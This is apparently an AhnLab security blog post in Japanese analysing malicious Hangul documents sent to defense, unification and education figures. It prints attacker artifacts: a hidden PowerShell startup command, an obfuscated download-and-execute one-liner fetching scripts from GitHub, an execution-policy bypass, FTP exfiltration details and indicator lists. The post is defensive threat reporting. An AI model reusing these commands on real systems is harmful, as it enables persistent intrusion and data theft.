Posted By ,

不正な OLE オブジェクトが挿入されたアレアハングルドキュメントに注意

AhnLab Security Emergency response Center (ASEC)は、国防、マスコミ等の特定分野の関係者を対象とする不正な OLE オブジェクトが挿入されたアレアハングルドキュメント(.hwp)を確認した。マルウェアは主にメールに挿入されたダウンロード URL、または添付ファイルを通じて配布されるものと推定される。配布されるドキュメントのファイル名が、国防、統一、教育および放送分野と関連しており、攻撃者は当該分野の関係者を対象にマルウェアを配布しているものと見られる。

本文で解析したアレアハングルドキュメントには大きく分けて2種類のタイプがあり、外部 URL に接続するタイプと追加のスクリプトファイルを作成するタイプが確認された。[タイプ2]の場合、過去ブログ[1] で確認されたマルウェアと動作方式が類似しており、同じ FTP サーバーの Password を使用することから、同じ製作者と推定される。

各タイプの簡略的な動作プロセスは以下の通りである。

図1. 動作プロセス

<タイプ1>

このタイプはアレアハングルドキュメントに挿入された OLE オブジェクトを通じて外部 URL に接続するものである。このタイプのものと推定されるアレアハングルドキュメントのファイル名は、以下の通りである。

日付 ファイル名
2023.05.25 統一** Q シート5月29日 月.hwp
2023.05.25 20230508_教授会議資料_様式変更.hwp
2023.05.25 (***)2023-05-30 教授会議資料.hwp
2023.05.30 支払確認書(*** 所長).hwp
2023.05.30 (様式)祝儀、弔意_支払確認書.hwp
2023.06.22 20230512_明博シナリオ_細部.hwp
2023.06.22 1-1.専門組織内研究支援別途機能設置(**大学院大学校産学協力団).hwp
2023.06.22 フ** *** 前総理名誉博士授与式総長参考資料.hwp
2023.06.23 [教員研修部-489(添付)] [附録3] 講師カード(書式).hwp
2023.06.29 政争の犠牲となっている国家安保守護機能.hwp
2023.07.11 統一**2023年4月30日(日).hwp
2023.07.17 特集 北朝鮮の畜産業と生活の質 チョ**.hwp
2023.07.20 42- ワグナーの教訓 (2023. 8).hwp
2023.07.24 [書式1] 事業費交付申請書.hwp
2023.08.14 論文審査書 (クォン**).hwp
2023.09.01 インセンティブ証明書類 **.hwp
2023.09.04 統一**9月6日最終水曜日.hwp
2023.09.06 キム**_謝礼費支給明細書.hwp
2023.09.19 [様式_附録5]_推薦者_確認書_様式-チョン**.hwp
表1. 確認されたアレアハングルドキュメントのファイル名

[表1]で確認されたアレアハングルドキュメントには OLE オブジェクトが実行されるように、ドキュメント本文にクリックを誘導するメッセージが挿入されている。

図2. ドキュメント本文

攻撃者は、ドキュメント内部に以下のようにページ範囲を超えるサイズの OLE オブジェクトを挿入し、ユーザーがどこを選択しても OLE オブジェクトが実行されるようにしている。

図3. ドキュメント内部に挿入された OLE オブジェクト

挿入された OLE オブジェクトの内部には 5MB 以上のダミーバイトと共に、不正な URL が存在する。これにより、ユーザーが OLE オブジェクトをクリックするとオブジェクト内部に存在する不正な URL に接続を試みる。

図4. アレアハングルドキュメントに挿入された OLE オブジェクト
図5. OLE オブジェクトをクリックすると生成されるメッセージボックス

解析当時は URL に接続されず、以降の振る舞いは確認できなかった。現在までに確認されている不正な URL は以下の通りであり、ドキュメントごとに異なるパラメータ値を使用することからして、特定のユーザーを対象にドキュメントを配布しているものと推定される。

  • hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[特定の値]
  • hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[特定の値]

<タイプ2>

アレアハングルドキュメントに不正なスクリプトファイルが挿入されたタイプで、最終的に github にアップロードされた追加スクリプトコードを実行する。このタイプのものと推定されるアレアハングルドキュメントのファイル名は、以下の通りである。

日付 ファイル名
2023.07.31 test.hwp
2023.07.27 謝礼費情報_aa.hwp
2023.08.31 諮問要請.hwp
2023.09.01 謝礼費様式.hwp
2023.09.14 main.hwp
2023.10.04 test1.hwp
2023.10.04 cna[q].hwp
表2. 確認されたアレアハングルドキュメントのファイル名

[表2]で確認された「test1.hwp」ドキュメントには2つのファイルが添付されており、当該スクリプトファイル(zz.bat)を実行するハイパーリンクが挿入されている。

図6. test1.hwp ドキュメントの本文

アレアハングルドキュメントを開くと、zz.bat と oz.txt ファイルが %temp% フォルダーに作成され、ユーザーがハイパーリンクが挿入された空欄または zz.bat ファイルアイコンをクリックすると zz.bat ファイルが実行される。

zz.bat には oz.txt に存在する Github のアドレスに接続し、追加のデータをダウンロードして実行する PowerShell コマンドが存在する。

図7. zz.bat ファイルの内容
図8. oz.txt ファイルの内容

したがって zz.bat を実行すると最終的に hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt に接続して不正なスクリプトを実行する。

図9. hxxps://raw.githubusercontent.com/babaramam/repo/main/pq.txt のコード
図10. Github にアップロードされているスクリプトコード

[図10]で確認された down.txt、info.txt、upload.txt にはすべて難読化されたデータがアップロードされており、当該 URL に接続すると特定のキー値で復号化して実行する。

hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt にアップロードされている PowerShell スクリプトには4つの関数が存在する。各関数の簡略的な機能は以下の通りである。

関数名 機能
mainFunc PowerShell ポリシーの変更
getinfo – uploadResult – downCommand の順に関数を実行
getinfo Hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt にアップロードされたスクリプトを実行
ネットワーク設定情報等のユーザー PC 情報を収集
uploadResult Hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txtupload.txt にアップロードされたスクリプトを実行
攻撃者の FTP サーバーに収集した情報をアップロード
downCommand hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt にアップロードされたスクリプトを実行
追加の不正なファイルを作成
表3. 関数別機能

一番最初に実行される mainFunc 関数は、以下のコマンドを通じて現在のユーザーの PowerShell ポリシーを変更し、以降ダウンロードする PowerShell スクリプトが実行されるようにする。

  • Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
図11. mainFunc コード

getinfo 関数は hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt にアップロードされている難読化されたスクリプトを実行する。
復号化された info.txt スクリプトはユーザー情報を収集する機能を実行する。収集された情報は %APPDATA%\Ahnlab\Ahnlab.hwp ファイルに保存される。

収集する情報は以下の通りである。

コマンド 収集情報
Get-ChildItem ([Environment]::GetFolderPath(“Recent”)) 最近使用したファイルのリスト
ipconfig /all ネットワーク設定のリスト
Get-process プロセスリスト
表4. 収集情報
図13. 作成された Ahnlab.hwp ファイル

uploadResult 関数もまた、hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt にアップロードされている難読化されたスクリプトを実行する。
復号化された upload.txt スクリプトは、情報を収集したファイル(%APPDATA%\Ahnlab\Ahnlab.hwp)を攻撃者に転送したあと、削除する。攻撃者は、窃取した情報を収集するために FTP を使用した。

図14. 復号化された upload.txt コード
  • アドレス : plm.myartsonline[.]com
  • ユーザー名 : 4154836

以降、持続的に実行される downCommand 関数は hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt にアップロードされている難読化されたスクリプトを実行する。
down.txt はマルウェアの持続性を維持するため、さらなる不正なファイルを作成する。攻撃者は不正なスクリプトが持続的に実行されるように、スタートアッププログラムフォルダーにリンクファイル(LNK)を作成する。

図15. 作成されたリンクファイル

作成されたリンクファイルには thumbs.log ファイルを実行するコマンドが含まれている。thumbs.log には hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt にアップロードされたスクリプトを実行する PowerShell コマンドが存在する。
これにより、ユーザーが PC を再起動するたびに hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt にアップロードされたスクリプトが実行される。

  • LNK ファイルの command
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log‘);invoke-expression $x}
  • thumbs.log のデータ
    [string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c

現在までにユーザー情報収集以外にさらなる不正な振る舞いは確認されていないが、hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt にアップロードされるコマンドによって様々な不正な振る舞いが実行されることがある。

本文で説明したタイプのほかにも、7月に掲載したブログ[2] のマルウェアもアレアハングルドキュメントを通じて配布される等、最近不正なアレアハングルドキュメントが多数確認されている。ユーザーは、アレアハングルドキュメントを閲覧する際はドキュメントの作成者や送信者に注意しなければならない。

[ファイル検知]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)

[IOC]
<hwp>
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
<script>
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
<C2>
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:,

5 1 vote
評価する
Subscribe
Notify of
guest

0 コメント
Inline Feedbacks
View all comments